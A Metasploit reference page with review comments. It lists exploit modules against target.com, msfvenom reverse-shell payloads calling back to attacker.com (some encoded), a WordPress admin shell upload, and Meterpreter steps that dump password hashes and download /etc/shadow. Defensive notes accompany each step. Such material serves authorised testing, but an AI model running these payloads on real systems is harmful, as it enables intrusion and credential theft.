
Metasploit

Penetration testing framework

Description

Metasploit Framework is the most widely used penetration testing tool in the world. It provides exploit development, payload generation, post-exploitation modules, and auxiliary scanning tools. Essential for any security professional.

Installation

BASH
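# Kali (pre-installed): the framework ships with the distribution, so the
# console can be started directly.
msfconsole

# curl installer
# The URL tracks the mutable `master` branch, so the script's content can
# change between downloads. Save it to a file, read it, then execute it.
#   --proto '=https' --tlsv1.2  refuse non-HTTPS transport and old TLS versions
#   -f                          fail on an HTTP error instead of saving the
#                               error page as "msfinstall"
#   -sS                         no progress meter, but still print errors
#   && chmod                    only mark the file executable if the download
#                               succeeded
curl --proto '=https' --tlsv1.2 -fsS -o msfinstall \
  https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
  && chmod +x msfinstall
# Review the downloaded script (e.g. `less msfinstall`) before this step: it
# runs with the privileges of the invoking user.
./msfinstall

# Docker
# No tag is given, so the `latest` image is pulled; pin a tag or digest when a
# reproducible toolchain is needed. --rm deletes the container on exit, so
# nothing created inside it persists unless a volume is mounted.
docker run --rm -it metasploitframework/metasploit-framework msfconsole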

Basic Usage

BASH
# Launch console
msfconsole

# Search for exploits
# Keywords narrow the module search: type: is the module class, platform: the
# target OS; the remaining word is free text.
msf6> search type:exploit platform:linux apache

# Use an exploit
# The module name points at Bash environment-variable injection reached through
# Apache mod_cgi; a patched Bash on the server is the fix.
# RHOSTS is the system under test; LHOST is the address the payload connects
# back to.
# NOTE(review): target.com and attacker.com are registrable domains, not
# reserved documentation names (example.com, 192.0.2.0/24). Replace them with
# in-scope lab hosts; pasted as-is, traffic goes to a third party.
msf6> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6> set RHOSTS target.com
msf6> set LHOST attacker.com
msf6> exploit

# Generate payload
# -p selects the payload and -f the output format; msfvenom writes the result
# to stdout, hence the redirect into a file.
# Both payloads are reverse-TCP: the host that runs the file opens an outbound
# connection to LHOST:LPORT, so egress filtering and alerting on unexpected
# outbound sessions are the network controls that apply.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f elf > shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f exe > shell.exe

Advanced Usage

BASH
# Auxiliary scanner
# RHOSTS accepts a CIDR range; 10.0.0.0/24 makes the module probe every address
# in that /24. Auxiliary modules are started with `run`.
msf6> use auxiliary/scanner/http/http_version
msf6> set RHOSTS 10.0.0.0/24
msf6> run

# Database integration
# db_nmap runs nmap and stores its results in the framework database (check the
# connection first with db_status). -sV is service/version detection and
# -p 1-65535 covers every TCP port, which is slow and very visible in firewall
# and IDS logs. `services` and `vulns` then query what was stored.
msf6> db_nmap -sV -p 1-65535 target.com
msf6> services -p 80,443
msf6> vulns

# Post-exploitation (Meterpreter)
# NOTE(review): this list mixes target platforms - hashdump reads Windows
# account hashes, while /etc/shadow is a Unix path - so not every line applies
# to the same session. Both hold password hashes and normally need
# elevated privileges to read; access to them is a high-value event to alert on.
# portfwd add: -l is the local listening port, -p the remote port and -r the
# remote host; traffic is relayed through the session.
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump
meterpreter> upload /path/to/file /tmp/file
meterpreter> download /etc/shadow
meterpreter> shell
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.0.1

# Payload generation with encoding
# -e selects an encoder and -i the number of encoding passes. Encoding rewrites
# the payload bytes only; the decoded payload and its outbound connection to
# LHOST:LPORT are unchanged, so host behaviour monitoring and egress controls
# still apply.
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -e php/base64 -f raw > shell.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -e x64/xor_dynamic -i 5 -f exe > shell.exe

Common Workflows

BASH
# Web application exploitation
# As the USERNAME/PASSWORD options show, this module is authenticated: it needs
# working WordPress administrator credentials (the values here are
# placeholders). The defensive counterpart is strong, unique admin credentials
# with MFA, and disabling plugin/theme installation from the dashboard
# (DISALLOW_FILE_MODS in wp-config.php).
msf6> use exploit/unix/webapp/wp_admin_shell_upload
msf6> set RHOSTS target.com
msf6> set USERNAME admin
msf6> set PASSWORD password123
msf6> exploit

# Listener setup
# multi/handler waits for a connection from a payload generated separately; the
# payload and LPORT set here must match the generated one.
# NOTE(review): LHOST 0.0.0.0 binds the listener on every interface of the
# host. Bind to the single interface used for the test so the listener is not
# exposed on other networks.
# exploit -j starts the handler as a background job (list with `jobs`).
msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 0.0.0.0
msf6> set LPORT 4444
msf6> exploit -j